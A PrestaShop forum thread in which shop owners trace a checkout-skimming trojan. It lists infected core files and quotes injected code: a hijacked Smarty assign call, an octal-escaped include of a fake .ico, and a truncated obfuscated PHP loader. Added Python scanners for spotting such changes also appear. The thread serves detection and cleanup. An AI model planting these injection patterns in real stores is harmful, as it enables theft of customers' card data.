Prescol Posted January 12, 2023

I spent 6 hours finding the files modified by this trojan, which replaces the checkout process with its own content to steal credit card or PayPal accounts. So, in order to save you more hours of research, here are some tips to find it.

The attacker injects code into smarty_cacheresource.php. This code, which is obfuscated in a way only a Russian government can do, creates a fake smarty class called smarty_internal_validation, which you will never be able to see because it is created on the fly and PHP is instructed to know how to use it.

Then, a subtle modification is added to the smarty_internal_data::assign() method. The following line is added before assigning a variable:

$tpl_var = Smarty_Internal_Validate::Validate($tpl_var);

It looks like it is part of the Prestashop environment, but it is not. This call injects malicious JavaScript into $hook_header, which is responsible for replacing the original payment button with the fake one.

I found the same behavior recently in another shop, but the way they injected the code was much simpler, by decoding a file containing malicious JavaScript within a tpl.

Hope it helps you if you are in the same situation. For me it was a pain in the ass spending half a day searching for it.

TiaNex Shopping Posted January 13, 2023

Thank you for your work, what's the content of Smarty_Internal_Validate::Validat

JakubMlk Posted January 16, 2023

I passed the same injection today, it infects a lot of files, but I don't know how to prevent being infected. To correct your Presta it helps to copy original files over infected ones.

Infected files:
controllers\front\IndexController.php
modules\bankwire\controllers\front\validation.php
tools\smarty\sysplugins\smarty_cacheresource.php
tools\smarty\sysplugins\smarty_internal_data.php
cache\tcpdf\index.php

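One way to find which files differ before copying originals back, as an added example (not code from any poster or from the cleaner tool): it compares a live tree against an unpacked pristine copy of the same PrestaShop version. The function names, report keys and demo trees are assumptions made for illustration; the marker string and the file names come from the posts above.

```python
import hashlib
import os
import tempfile

# Marker from the first post: the injected call is Smarty_Internal_Validate::Validate().
# PHP class names are case-insensitive, so the match is done on lowercased bytes.
MARKER = b"smarty_internal_validat"


def sha256_file(path):
    """Stream a file through SHA-256 so large files are not held in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def index_tree(root):
    """Map each file's path relative to root (with / separators) to its full path."""
    files = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            files[os.path.relpath(full, root).replace(os.sep, "/")] = full
    return files


def compare_trees(live_root, pristine_root):
    """Report core files that changed, added files holding PHP, and marker hits."""
    live = index_tree(live_root)
    pristine = index_tree(pristine_root)
    report = {"modified": [], "added_with_php": [], "marker": []}
    for rel, path in sorted(live.items()):
        with open(path, "rb") as fh:
            data = fh.read()
        if rel in pristine:
            if hashlib.sha256(data).hexdigest() != sha256_file(pristine[rel]):
                report["modified"].append(rel)
        elif b"<?php" in data or b"<?=" in data:
            # Not shipped with the release and contains PHP, whatever its extension.
            # Compiled templates under cache/ also land here and need a manual look.
            report["added_with_php"].append(rel)
        if MARKER in data.lower():
            report["marker"].append(rel)
    return report


def _write(root, rel, text):
    path = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(text)


def demo():
    """Run the comparison on two small constructed trees and return the report."""
    data_php = "tools/smarty/sysplugins/smarty_internal_data.php"
    clean = "<?php\nfunction assign($tpl_var) {\n    return $tpl_var;\n}\n"
    infected = clean.replace(
        "    return",
        "    $tpl_var = Smarty_Internal_Validate::Validate($tpl_var);\n    return",
    )
    with tempfile.TemporaryDirectory() as pristine, tempfile.TemporaryDirectory() as live:
        for root in (pristine, live):
            _write(root, "classes/Tools.php", "<?php // unchanged, constructed\n")
        _write(pristine, data_php, clean)
        _write(live, data_php, infected)
        _write(live, "modules/ps_searchbar/.f26945b1.ico", "<?php /* constructed */\n")
        return compare_trees(live, pristine)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

Modules installed after the release will show up as added files, so the report is a list to review, not a list to delete.
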
Eolia Posted January 27, 2023

Use my cleaner.php, this hack is detected:
https://devcustom.net/public/scripts/cleaner.zip

Open the zip.
Take the cleaner.php file and place it at the root of your site.
Then you call it with this url: https://yoursite.com/cleaner.php

skur2000 Posted February 2, 2023

Best topic, we have this problem, and solve this. Thanks!

Shin_P Posted February 2, 2023

I migrated to 1.7 because of this trojan IDK what's worse..

Eolia Posted February 2, 2023

Lol. This trojan is on 1.7/8 versions too^^

Shin_P Posted February 2, 2023

f**k. me.

So what does your "cleaner" do? Overwrites the core modified files?

Has anyone found the point of entry of this hack? I thought it was either the outdated PHP version I was running with (5.6) or the PS installation (1.6).

Now I'm on PHP 7.4 and PS 1.7, please tell me I'm OK or I'll kill myself XD

Eolia Posted February 2, 2023

Cleaner scans and informs you if core files have been modified or if known infections have been added, blocks certain malicious code, and destroys known added files.

The infection comes either from a badly secured third-party module, or from another CMS installed on the same hosting (WordPress not up to date or other).

The PHP version has nothing to do with the hack.

The 1.6.2 version will be so cool

Shin_P Posted February 2, 2023

Well, I had an out of date WP blog ...... 🙄

Thank you very much for the information, page bookmarked, but truly hope I won't need it soon XD

Jurist Posted February 2, 2023

Looks like multiple stores of ours have just been attacked by this. How do we prevent that issue? Cleanup is not enough. We need to stop that from happening.

Prescol Posted February 2, 2023 (Author)

It is a planned attack and backed by an institution, not someone in his house. Bad times are coming for maintenance, since each time a Prestashop store is attacked it is done with zero day exploits, meaning they were kept secret until today.

Shin_P Posted February 2, 2023

time to get more religious 🙏

Prestachamps Posted February 6, 2023

Hi @Prescol,

Thank you for helping others by sharing the information.

Have a nice day,
Leo.

El Patron Posted February 6, 2023

On a clean shop this module will tell you when files have been modified: size/time/group/owner.

- commit trusted change
- restore untrusted change from built-in vault

Not one bug fix required since written for PS 1.4.

Also allows one to monitor what files your developer may have changed, priceless.

https://www.addons.prestaheroes.com/collections/all-modules/products/prestavault-malware-trojan-virus-protection?variant=40653346603215

nsordk Posted February 9, 2023

Had my own fight with this today and would like to share my findings.

I cleaned the changes mentioned in the tools -> smarty folder, but without finding out how it was done. Later today the changes were back.

After searching access logs I found that 2 files in classes were changed: Tools.php and Dispatcher.php. These changes allowed the intruder to call ini.php through POST and it would create this file in the root.

It was the plugin TMSocialLogin that was used as a way in. This was on Prestashop 1.6.

Eolia Posted February 9, 2023

2 minutes ago, nsordk said:
> Had my own fight with this today and would like to share my findings. I cleaned the changes mentioned in the tools -> smarty folder, but without finding out how it was done. Later today the changes were back. After searching access logs I found that 2 files in classes were changed: Tools.php and Dispatcher.php. These changes allowed the intruder to call ini.php through POST and it would create this file in the root. It was the plugin TMSocialLogin that was used as a way in. This was on Prestashop 1.6.

Cleaner detects this^^
https://shop.devcustom.net/fr/content/16-nettoyage-hack

El Patron Posted February 9, 2023

On 2/6/2023 at 6:11 PM, PrestaHeroes.com said:
> On a clean shop this module will tell you when files have been modified: size/time/group/owner. Commit trusted change, restore untrusted change from built-in vault. Not one bug fix required since written for PS 1.4. Also allows one to monitor what files your developer may have changed, priceless.
> https://www.addons.prestaheroes.com/collections/all-modules/products/prestavault-malware-trojan-virus-protection?variant=40653346603215

This will detect and you can restore. If you manually detect and 'fix', set the leaky files to read only.

Also upgrade from 1.6 to latest 1.7.....get rid of old leaky modules...

Eolia Posted February 10, 2023

12 hours ago, Fred PrestaHeroes said:
> also upgrade from 1.6 to latest 1.7.....get rid of old leaky modules...

Lol, last infections detected on 1.7.8 version:

/*b3b2b*/ @include ("\057home\057vgd/\167ww/x\147xxx\056xx/m\157dule\163/ps_\163earc\150bar/\056f269\0645b1.\151co"); /*b3b2b*/

Fake ico file infected: /home/vgd/www/xxxxxx/modules/ps_searchbar/.f26945b1.ico

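An added detection example for the include line quoted in the post above (not code from the poster or from cleaner.php): it finds include/require statements whose double-quoted path is spelled with octal or hex escapes, decodes the path, and flags hidden or non-PHP targets. The function and field names are assumptions; the third sample line is the one from the post, the first two are constructed.

```python
import os
import re
from dataclasses import dataclass

# include/require with a single double-quoted literal, with or without @ and ().
INCLUDE_RE = re.compile(
    r'\b(include_once|include|require_once|require)\b\s*\(?\s*"((?:[^"\\]|\\.)*)"',
    re.IGNORECASE,
)
# PHP double-quoted escapes handled here: \\ , \NNN (octal) and \xHH (hex).
ESCAPE_RE = re.compile(r'\\(?:(\\)|([0-7]{1,3})|x([0-9A-Fa-f]{1,2}))')
PHP_EXTENSIONS = {".php", ".phtml", ".inc"}

# Line 3 is the injected line quoted in the post; lines 1-2 are constructed.
SAMPLE = r'''<?php
require_once "config/defines.inc.php";
/*b3b2b*/ @include ("\057home\057vgd/\167ww/x\147xxx\056xx/m\157dule\163/ps_\163earc\150bar/\056f269\0645b1.\151co"); /*b3b2b*/
'''


@dataclass
class Finding:
    line: int        # 1-based line number in the scanned source
    decoded: str     # include path after resolving the escapes
    escapes: int     # number of octal/hex escapes used to spell the path
    hidden: bool     # target file name starts with a dot
    extension: str   # extension of the target file


def decode_php_string(literal):
    """Resolve \\\\, octal and hex escapes the way PHP does in double quotes."""
    def repl(match):
        if match.group(1) is not None:
            return "\\"
        if match.group(2) is not None:
            return chr(int(match.group(2), 8) & 0xFF)
        return chr(int(match.group(3), 16))
    return ESCAPE_RE.sub(repl, literal)


def scan_source(text):
    """Return a Finding for every include whose target looks disguised."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for match in INCLUDE_RE.finditer(line):
            raw = match.group(2)
            escapes = sum(1 for e in ESCAPE_RE.finditer(raw) if e.group(1) is None)
            decoded = decode_php_string(raw)
            name = decoded.replace("\\", "/").rsplit("/", 1)[-1]
            extension = os.path.splitext(name)[1].lower()
            hidden = name.startswith(".")
            if escapes or hidden or extension not in PHP_EXTENSIONS:
                findings.append(Finding(lineno, decoded, escapes, hidden, extension))
    return findings


def scan_tree(root):
    """Yield (path, Finding) for every .php file below root."""
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if name.lower().endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for finding in scan_source(fh.read()):
                        yield path, finding


if __name__ == "__main__":
    for hit in scan_source(SAMPLE):
        print(hit)
```
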
El Patron Posted February 10, 2023

11 hours ago, Eolia said:
> Lol last infections detected on 1.7.8 version
> @include ("\057home\057vgd/\167ww/x\147xxx\056xx/m\157dule\163/ps_\163earc\150bar/\056f269\0645b1.\151co");
> fake ico file infected : /home/vgd/www/xxxxxx/modules/ps_searchbar/.f26945b1.ico

Oh, so you think all PS are hacked? I think it's more when people use free mods, which I defended to have removed from the forum....also 1.7.5 and earlier PS did dirty, they create mod folder with 777 during installation. I caught them once years ago and they took it away...but it's back...

We do a lot of different stores and many customers; over the years the number of people hacked was zero. We are getting new customers who are currently being hacked, one selling balls in the US for over 1,000,000 a month...the hack sent all customer info and cc info. Amazing..

Anyway, I "know" I wrote the best detect/restore module for "any" CMS after my 1.4 module store was hacked, I was pissed loool. We also have a Plesk extension that does what ImunifyAV does but also has rollback...among other things.

Cybersecurity is like porn, but you have to pay for it.

It's me. I also have a module that analyzes PS permissions; we thought of releasing it for free but it provides information for hackers to attack....amazing.

Using Google Translate. Why do we even have separate forums, today's browser translations work fine...

Have a good weekend

Eolia Posted February 10, 2023

I'm just saying that the PS version has nothing to do with it. For a hack to take place there are not 36 solutions:
- Theft of FTP credentials
- Unsecured module with upload functions
- Other unsecured CMS on the same hosting (8 obsolete WPs lately have infected PS)

Prestashop, since version 1.2, has always controlled uploads and has never allowed direct access to these directories.

Regarding the rights, once a module is installed, regardless of whether it is 777, 755 or other, PHP can run, create and modify directories.

Prescol Posted February 10, 2023 (Author)

If you speak in English in this channel, everyone could know what you are talking about and the information will be useful for all, given this message is posted in the English channel. Please @Eolia and fred, I'm appealing to your experience in the forum, update your messages with an English version.

Stefand Posted February 11, 2023

Is this reported to the PrestaShop team?

Eolia Posted February 11, 2023

29 minutes ago, Stefand said:
> Is this reported to the PrestaShop team?

Why? It's not a Prestashop issue.

Stefand Posted February 12, 2023

@Eolia I don't understand the trojan's new method at all in this post.

"The attacker injects a code into smarty_cacheresource.php"

This is a default file in PrestaShop, right? How is this trojan injected as the owner of this post says? Or is it injected in that file through a module?

Eolia Posted February 12, 2023

No, this smarty_cacheresource.php story could only allow a possible reading of the database by XSS injection and ONLY in case you have activated MySQL caching. A patch has been proposed for all versions at this level.

Today's hacks have nothing to do with it and, FYI, have been around for a long time.

https://bb.enter-solutions.net/topic/1075/des-modules-et-des-hacks-liste-non-exhaustive-des-modules-présentant-un-risque/16

Eolia Posted February 13, 2023

Cleaner checks this file in your admin dir: get-file-admin.php

If this file does not exist it's a real problem...

redrum Posted March 18, 2023

On 1/27/2023 at 5:21 PM, Eolia said:
> Use my cleaner.php this hack is detected https://devcustom.net/public/scripts/cleaner.zip Open the zip Take the cleaner.php file and place it at the root of your site Then you call it with this url: https://yoursite.com/cleaner.php

I suggest you change the behavior of the script, so it doesn't delete, edit or replace files automatically. A better approach would be to display all the errors and let the user decide if he wants to delete, edit or replace each error.

Boonyawat Posted April 10, 2023

Is there a way to prevent this? I have recent backup files so I decided to restore my website. But I wonder how I can prevent this from happening again.

El Patron Posted April 10, 2023

14 hours ago, Boonyawat said:
> Is there a way to prevent this? I have a recent backup files so I decided to Restore my website. But I wonder how I can prevent this not happen again.

Yes, upgrade to latest 1.7, remove all those disabled and free modules... stop loading free modules, I don't know why PS allows unvetted free modules on forums. Very few hacks have been successful with 'addons' vetted modules.

Then put on hosting that supports Immunavy....

If PS is not a hobby but serious business, sitting on hands on old PS...that's on you; loading free unvetted modules...that is on PS and you.

PrestaPro LTD Posted May 19, 2023

Hello everyone again. This means that Prestashop and other free software has run out of steam, if you don't have a lot of money or are not the smartest programmer in the world, a PrestaShop store will never be safe.

doekia Posted May 19, 2023

On 4/10/2023 at 10:54 PM, PrestaHeroes USA said:
> very few hacks have been successful with 'addons' vetted modules.

- sendtoafriend (native)
- paypal (native)
- all modules with php-unit ... eval-stdin.php (native & addons)
- attributewizardpro (addons)
- cartabandonmentpro (addons)
- ...

The list contains numerous examples that contradict such a statement.

El Patron Posted May 19, 2023

5 hours ago, doekia said:
> - sendtoafriend (native) - paypal (native) - all modules with php-unit ... eval-stdin.php (native & addons) - attributewizardpro (addons) - cartabandonmentpro (addons) - ... List contains numerous examples that contradict such statement.

Well, that is very few compared to the 1000's on there, at least they have to go through validation, so yes there are a few. I would think PS updated their validation to try to keep those things from happening. On the free modules, that does not happen...so your point falls on deaf ears.

Eolia Posted May 19, 2023

Very few ?

doekia Posted May 20, 2023

And this list is not exhaustive either!

Mediacom87 Posted May 20, 2023

Hi,

To believe that only free modules are used as a gateway for hacking is a blatant mistake.

100% of the hacks I've been working on for months are related to paid modules.

Some information: https://www.mediacom87.fr/en/proactive-or-corrective-prestashop-security/

DARKF3D3 Posted May 20, 2023

On 7/2/2023 at 12:11 AM, PrestaHeroes USA said:
> On a clean shop this module will tell you when files have been modified: size/time/group/owner. Commit trusted change, restore untrusted change from built-in vault. Not one bug fix required since written for PS 1.4. Also allows one to monitor what files your developer may have changed, priceless.
> https://www.addons.prestaheroes.com/collections/all-modules/products/prestavault-malware-trojan-virus-protection?variant=40653346603215

Is it compatible with PS8 and PHP8.1?

El Patron Posted May 20, 2023

3 hours ago, DARKF3D3 said:
> It is compatible with PS8 and PHP8.1?

I have just assigned someone to validate our modules on PS8, pv will be one of the first. Will update here or via messenger.

Note: we have a Plesk version of this module which has more features and can protect other/all domains defined to Plesk....in case anyone is interested.

DARKF3D3 Posted May 21, 2023

Thank you, I could be interested in the Plesk version.

Nickz Posted May 21, 2023

Shop owners should commence employing people in charge of taking care of your shop(s). How can you put your income source solely in the abilities of self help forums?

DARKF3D3 Posted May 21, 2023

Are you talking to me?

MockoB Posted July 13, 2023

Hi @Eolia, just tried your module on PS8.1 and it is not working properly. Is there any chance you'll make it compatible with the latest PS version? Thanks.

Eolia Posted July 13, 2023

No, see with Prestashop Team.

ronniee Posted November 16, 2023

Hi, I have a PS 1.6.1.4 version, in March it was hacked, somehow redirected card payment page. At that time I solved with this: (link)

To do so, locate the file config/smarty.config.inc.php on your PrestaShop install, and remove lines 43-46 (PrestaShop 1.7) or 40-43 (PrestaShop 1.6):

if (Configuration::get('PS_SMARTY_CACHING_TYPE') == 'mysql') {
    include _PS_CLASS_DIR_.'Smarty/SmartyCacheResourceMysql.php';
    $smarty->caching_type = 'mysql';
}

Right now again it was discovered JS/SpyBanker.IVtrojan. I see some files changed, for ex. classes/shop/shop.php classes/Store.php etc. has something like this at the end:

$r1e="d63LgMkA570XFPH2wSZiKncUjVoaCGOlExDW_s48ftYJ9NTyzBvmhIQpbeuRqr1";$w85=$r1e[40].$r1e[58].$r1e[21].$r1e[22].$r1e[41].$r1e[19].$r1e[26].$r1e[21].$r1e[36].$r1e[57].$r1e[33].$r1e[19].$r1e[37].$r1e[41].$r1e[37];$i17cd=$r1e[22].$r1e[61].$r1e[57].$r1e[27].$r1e[41].$r1e[57].$r1e[36].$r1e[40].$r1e[58].$r1e[21].$r1e[22].$r1e[41].$r1e[19].$r1e[2KCk7IAl9Owo='));@$x3e4e();}

I know that the upgrade is imminent but right now I need to restart the shop asap, but right now I haven't found the right person. My question is: is the above solution with cleaner.zip OK for this old 1.6.1.4 version?

Thank you
ron

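An added triage example for the appended snippet quoted in the post above (not the poster's code and not part of cleaner.php): the snippet builds strings by indexing characters out of a lookup string, and this resolver rebuilds them statically, without running any PHP. The function names and the list of risky names are assumptions; the sample is the visible part of the post's snippet, ending where the post's copy is cut.

```python
import re

# $name="lookup string";
TABLE_RE = re.compile(r'\$(\w+)\s*=\s*"([^"\\$]*)"\s*;')
# $name=$tbl[1].$tbl[2]...  (a run of indexed characters joined with ".")
CHAIN_RE = re.compile(r'\$(\w+)\s*=\s*((?:\$\w+\[\d+\]\s*\.?\s*)+)')
INDEX_RE = re.compile(r'\$(\w+)\[(\d+)\]')

# Names that deserve a closer look when they are assembled this way (assumed list).
RISKY = ("create_function", "eval", "assert", "base64_decode", "gzinflate", "str_rot13")

# Visible part of the snippet from the post; the second chain stops at the cut.
SAMPLE = (
    '$r1e="d63LgMkA570XFPH2wSZiKncUjVoaCGOlExDW_s48ftYJ9NTyzBvmhIQpbeuRqr1";'
    '$w85=$r1e[40].$r1e[58].$r1e[21].$r1e[22].$r1e[41].$r1e[19].$r1e[26].$r1e[21]'
    '.$r1e[36].$r1e[57].$r1e[33].$r1e[19].$r1e[37].$r1e[41].$r1e[37];'
    '$i17cd=$r1e[22].$r1e[61].$r1e[57].$r1e[27].$r1e[41].$r1e[57].$r1e[36]'
    '.$r1e[40].$r1e[58].$r1e[21].$r1e[22].$r1e[41].$r1e[19].'
)


def resolve_lookups(source):
    """Return {variable: rebuilt string} for every fully resolvable index chain."""
    tables = {m.group(1): m.group(2) for m in TABLE_RE.finditer(source)}
    resolved = {}
    for match in CHAIN_RE.finditer(source):
        chars = []
        for table_name, index in INDEX_RE.findall(match.group(2)):
            table = tables.get(table_name)
            if table is None or int(index) >= len(table):
                chars = []          # unknown table or bad index: skip this chain
                break
            chars.append(table[int(index)])
        if chars:
            resolved[match.group(1)] = "".join(chars)
    return resolved


def risky_names(resolved, min_len=4):
    """Map variables to the risky function name they spell, fully or as a prefix.

    Prefix matching covers captures that are cut short, like the sample above.
    """
    hits = {}
    for variable, text in resolved.items():
        if len(text) < min_len:
            continue
        for name in RISKY:
            if text.startswith(name) or name.startswith(text):
                hits[variable] = name
    return hits


if __name__ == "__main__":
    names = resolve_lookups(SAMPLE)
    print(names)
    print(risky_names(names))
```
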
Eolia Posted November 16, 2023

Yes, cleaner is ok!

Nickz Posted November 16, 2023

1 hour ago, ronniee said:
> I know that the upgrade is imminent but right now I need to restart the shop asap, but right now I haven't found the right person

This and further hacks will (most likely) increase. It should lead to a broader concept of shops. Do not only have one shop, have several, that way you can redirect visitors and it's highly unlikely that all versions get hacked. Those setups need time to monitor. Businesses grow and so does their employee number.

Search your log and access files, you might get the perpetrator.

micelio Posted February 8

On 2/2/2023 at 11:55, Eolia said:
> Lol This trojan is on 1.7/8 versions too^^

Hi Eolia, thank you for providing your cleaner.php which I used on one of my sites and discovered it was infected. I replaced all the files in red with the original files from the exact version of Prestashop 1.6.1.20. This did not solve the initial problem that the generated PDF invoices are unreadable.. I attach img.

Since I have two domains with two different sites in the same hosting space, I would like to check the second site too, which is made with Prestashop 1.7.8.8. I tried to put the cleaner.php in different places, but if I put it in public_html it starts but I read in "cleaner" that there are two directories to close one or something like that. How can I make cleaner work?

Also, do you have any suggestion for the correct creation of PDF invoices? Thanks

Have a nice day
Elio

Eolia Posted February 8

Delete your second admin.

micelio Posted February 9

22 hours ago, Eolia said:
> delete your second admin.

How? Delete your second admin. But there is a site built in the second domain. Or maybe there is a method I don't know, so I can control the second site, thanks

Eolia Posted February 9

2 different Prestashop sites cannot have files in common. Your second site must be in another directory. A Prestashop site must only have one admin directory.

Nickz Posted February 9

2 hours ago, micelio said:
> Or maybe there is a method I don't know, so I can control the second site, thanks

Why don't you take the time and plan ahead? The 1.6 site you could convert into an eolia shop or Thirtybees. That way you have a fresh design, can clean the database and speed everything up.

To use 2 shops in the same hosting is not really prudent, I know most people act due to ease. But you become dependent. Dependency is not what you need in business.

It costs you about €50 to 100 per year to use a 2nd hosting. The times where one shop conquered the world like Amazon are clearly over. Several shops raise chances in ranking over a broader spectrum and give you more security. Except if they infect your PC.

If you wish for safety, use a laptop to access shops and another to open emails.

micelio Posted February 9

5 hours ago, Eolia said:
> 2 different Prestashop sites cannot have files in common. Your second site must be in another directory. A Prestashop site must only have one admin directory.

Do you know if there is a practical way to separate the two sites? Since they are both in the same hosting, they have folders in common. The second domain is under construction, I could redo it and it is not a problem. I would just like to save the site which is www.micelimoto.com and I am fine with Prestashop version 1.6.1.20.

Thank you

Eolia Posted February 9

Keep all your directories except the duplicate admin. Then, create a new directory, at the same level as www (or public_html), and point your new domain name to this new directory. Then, install your Prestashop (or PhenixSuite) in your new directory.

micelio Posted February 9

2 hours ago, Eolia said:
> Keep all your directories except the duplicate admin. Then, create a new directory, at the same level as www (or public_html) and point your new domain name to this new directory. Then, install your Prestashop (or PhenixSuite) in your new directory)

I think I am not capable of doing what you tell me. I can create in the same level as public_html a new directory (new folder) and name it after the name of the 2nd domain, okay? I don't know how to get my second domain to point to this new directory. But won't all the existing shared directories of the two different versions of Prestashop bother each other?

Could you help me with that? I would like to correct this situation I have in hosting. Create two completely separate sites in the same space, each with its own version of Prestashop. Do you think this correction can be made? Thanks

Eolia Posted February 9

At your host you can define to which folder the new domain should be directed.

Maxflor Posted February 15

Please, a long time ago, we had the mentioned hack on the site that added a fake payment module, but we removed the error. Well, almost a year later, we currently have the problem that our server is crashing because the website is arbitrarily sending us an awful lot of e-mails, and our server is overwhelmed and crashes. Backoffice totally unusable and cPanel slowed down. Can anyone tell me what it could be and how to remove it? Thank you very much

Nickz Posted February 15

1 hour ago, Maxflor said:
> and our server is overwhelmed and crashes.

Make a backup, export the database, clean everything up. Get a better server. While you're at it, change access to backend and databases.

In your shoes I would redo the entire shop.

Maxflor Posted February 15

Nickz, how do you mean to redo the whole shop? I mainly need to remove the error that causes the problem with the meaningless sending of emails. The e-shop worked well for us before. Recently, they adjusted the purity of the codes on the e-shop and everything was ok. Can you give me a tip on the procedure, what would you do? How to find the problem as soon as possible and eliminate it? I wanted to connect Cloudflare to the website to speed it up a bit. Thank you very much

Mediacom87 Posted February 15

33 minutes ago, Maxflor said: Nickz, how do you mean to redo the whole shop? I mainly need to remove the error that causes the problem with the meaningless sending of emails. The e-shop worked well for us before. Recently, they adjusted the purity of the codes on the e-shop and everything was ok. Can you give me a tip on the procedure, what would you do? How to find the problem as soon as possible and eliminate it? I wanted to connect Cloudflare to the website to speed it up a bit. Thank you very much

Explain how to do in 2 minutes something that takes at least a day to do.

There are no secrets, no tricks to be passed on, just common sense, an analysis of all the files, of the entire structure. Knowing the normal PrestaShop structure by heart saves time, but that's something you acquire over the long term, and I'm not even talking about intervening on a site that has never respected anything.

Everything has already been explained: sites reference all the security alerts, already posted several times; community modules allow you to identify vulnerabilities, already posted dozens of times; techniques have been explained, written in articles, to climb the first step of the staircase. But there's no secret, just work and knowledge.

You've got flaws, you haven't fixed them, and since your site has been hacked, it's going to be hacked every week by one or other technique, since it's now on the list of sites to be hacked.

The only way to do this is to clean up all the code in all the modules, one by one.

Eolia Posted February 15

3 hours ago, Maxflor said: Please, a long time ago, we had the mentioned hack on the site that added a fake payment module, but we removed the error. Well, almost a year later, we currently have the problem that our server is crashing because the website is arbitrarily sending us an awful lot of e-mails, and our server is overwhelmed and crashes. Backoffice totally unusable and cPanel slowed down. Can anyone tell me what it could be and how to remove it? Thank you very much

https://devcustom.net/public/scripts/cleaner.zip
Open the zip
Take the cleaner.php file and place it at the root of your site
Then you call it with this url: https://yoursite.com/cleaner.php

sebastienazar Posted February 15

VERY GOOD TOOLS! Thank you for evolution!

Nickz Posted February 15

10 hours ago, Maxflor said: how do you mean to redo the whole shop? I mainly need to remove the error that causes the problem with the meaningless sending of emails.

Redoing a shop removes every possible entrance to your shop. Removing parts of code leaves the shop open to new hacks. Mails which are sent from your server mean you are hacked.

braccetto Posted March 1

Hi friend, I've been attacked by a trojan some days ago. I placed a backup on local and tried the cleaner.php but it is not working well.
- It starts and checks for upgrading
- it downloads the upgraded file ('3.1.9') and renamed itself to an alphanumeric one
- but it gets stuck and doesn't start (also tried to rename again in cleaner.php but it restarts and says "telechargement de la dernier version.....")
- I'm now in a loop, because after "telechargement" it says "impossible to reach site"
Does anyone know if it is compatible with PS 1.6.1.7 and PHP 7? (the version I'm running)

sebastienazar Posted March 1

You need to increase the server memory with a php.ini; that worked for me.

El Patron Posted March 15

To know when files are changed on your PrestaShop, this module will alert you; if there are unauthorized changes you can restore the file(s). Nothing like this for any CMS on the planet.

https://prestaheroes.com/collections/all-modules/products/prestavault-malware-trojan-virus-protection?variant=40653346603215

skur2000 Posted March 22

Hi friends. Can you help me? An old PrestaShop 1.6 version with the 3.2.1 cleaner has a 500 internal server error. I use an old version of the cleaner script; it updates after running, and I see the script's name change, and next, an internal server error after seconds of the script working. Logs are clear. Before, the cleaner started and worked very fine; maybe it is after the script update.

500 Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request. Please contact the server administrator at to inform them of the time this error occurred, and the actions you performed just before this error. More information about this error may be available in the server error log.

Atomico Posted April 16

On 1/27/2023 at 5:21 PM, Eolia said: Use my cleaner.php, this hack is detected. https://devcustom.net/public/scripts/cleaner.zip Open the zip. Take the cleaner.php file and place it at the root of your site. Then you call it with this url: https://yoursite.com/cleaner.php

Hello, I am trying your script but after a first update, I receive error 500.

Nickz Posted April 16 (Edited April 16 by Nickz)

48 minutes ago, Atomico said: Hello, I am trying your script but after a first update, I receive error 500.

Look into the server logs, many times here: var/log/apache2/errorlog

Atomico Posted April 17

15 hours ago, Nickz said: Look into the server logs, many times here: var/log/apache2/errorlog

Hello, I have only these 2 rows:

[Wed Apr 17 08:48:45.882526 2024] [proxy_fcgi:error] [pid 734:tid 140236159960832] [client xxxxxx:33932] AH01067: Failed to read FastCGI header
[Wed Apr 17 08:48:45.882574 2024] [proxy_fcgi:error] [pid 734:tid 140236159960832] (104)Connection reset by peer: [client xxxxxx:33932] AH01075: Error dispatching request to :

Nickz Posted April 17

8 hours ago, Atomico said: AH01067: Failed to read FastCGI header

Have a look here: https://serverpilot.io/docs/error-failed-to-read-fastcgi-header/

El Patron Posted April 17 (Edited May 17 by PrestaHeroes USA)

Our FileStasis Attack Surface Monitor (ASM) + Restore for PrestaShop module will 1) build a vault of mission-critical files, 2) monitor and report when file changes/additions/deletions are found, and allows you to commit a trusted change to the vault or restore an untrusted change from the vault.

The most important part of detecting a hack is knowing which files changed; that is the purpose of this module.

https://prestaheroes.com/products/prestavault-malware-trojan-virus-protection?variant=40653346635983

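The baseline-and-compare workflow described in the post above (record trusted files, report changes, additions and deletions, then commit reviewed changes), as an added Python example; it is not the PrestaHeroes module's code or anything posted in this thread. The watched extensions, the function names and the sample file tree are assumptions constructed for illustration.

```python
import hashlib
import tempfile
from pathlib import Path

WATCHED_EXT = {".php", ".tpl", ".js"}  # assumption: file types worth tracking

def build_manifest(root):
    """Map each watched file (path relative to root) to its SHA-256 digest."""
    manifest = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in WATCHED_EXT:
            digest = hashlib.sha256(path.read_bytes()).hexdigest()
            manifest[path.relative_to(root).as_posix()] = digest
    return manifest

def compare(baseline, current):
    """Report files changed, added and deleted since the trusted baseline."""
    shared = set(baseline) & set(current)
    return {
        "changed": sorted(p for p in shared if baseline[p] != current[p]),
        "added": sorted(set(current) - set(baseline)),
        "deleted": sorted(set(baseline) - set(current)),
    }

def commit(baseline, current, trusted):
    """Accept reviewed paths into the baseline; the rest stay flagged."""
    kept = {p: h for p, h in baseline.items() if p not in trusted}
    kept.update({p: current[p] for p in trusted if p in current})
    return kept

def demo():
    """Constructed sample tree: take a baseline, then make three kinds of change."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        def write(rel, text):
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_text(text)
        write("modules/demo/demo.php", "<?php // original\n")
        write("themes/demo/header.tpl", "<html>\n")
        baseline = build_manifest(root)
        write("modules/demo/demo.php", "<?php // modified\n")   # changed
        write("cache/demo/index.php", "<?php // new file\n")    # added
        (root / "themes/demo/header.tpl").unlink()              # deleted
        current = build_manifest(root)
        report = compare(baseline, current)
        baseline = commit(baseline, current, ["themes/demo/header.tpl"])  # reviewed
        return report, compare(baseline, current)

if __name__ == "__main__":
    print(demo())
```

Keep the saved baseline outside the web root, since whoever can modify the shop's PHP files can usually rewrite a manifest stored next to them.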
Peter_S83 Posted September 11

